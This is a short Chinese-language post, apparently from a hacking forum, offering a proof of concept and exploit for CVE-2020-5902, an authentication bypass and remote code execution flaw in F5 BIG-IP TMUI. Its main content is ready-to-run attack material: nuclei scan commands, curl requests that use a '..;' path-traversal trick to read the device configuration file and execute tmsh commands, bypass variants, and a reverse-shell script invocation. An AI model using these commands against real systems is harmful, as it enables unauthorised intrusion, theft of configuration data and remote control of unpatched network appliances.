POC TMUI 远程代码执行漏洞（CVE-2020-5902）

Shacker · 09 12, 2024

Java:

## 漏洞概述

认证绕过导致远程代码执行漏洞

攻击者可利用该漏洞执行任意的系统命令、创建或删除文件，关闭服务/执行任意的Java代码

## 影响范围

```http
BIG-IP 15.1.0
BIG-IP 14.1.0~14.1.2
BIG-IP 13.1.0~13.1.3
BIG-IP 12.1.0~12.1.5
BIG-IP 11.6.1~11.6.5
```

## POC

```http
nuclei -tags bigip -t cves/ -l urls.txt

Goby
```

## EXP

文件读取

```bash
curl -v -k "https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf"
```

RCE

```bash
curl -v -k  'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'
```

Bypass

```
..;  ==>  /hsqldb;

..;  ==>  /hsqldb%0a
```

reverse shell:

```
./CVE-2020-5902.sh <server> <localip> <localport>
```

[@Budi Khoirudin](https://twitter.com/x4ce/status/1279790599793545216?s=21)
[@jas502n](https://github.com/jas502n/CVE-2020-5902)

	POC Jenkins-CI 远程代码执行漏洞（CVE-2017-1000353） Shacker 09 13, 2024 POC/?Day漏洞数据
	POC Weblogic LDAP 远程代码执行漏洞 CVE-2021-2109 Shacker 09 13, 2024 POC/?Day漏洞数据
	POC [CVE-2020-2883]-T3反序列化 Shacker 09 13, 2024 POC/?Day漏洞数据
	POC Nacos未授权访问（CVE-2020-19676） Shacker 09 13, 2024 POC/?Day漏洞数据
	POC CVE-2020-17518 Shacker 09 10, 2024 POC/?Day漏洞数据

黑客仓库

POC TMUI 远程代码执行漏洞（CVE-2020-5902）

论坛统计

新会员

在线会员

关于我们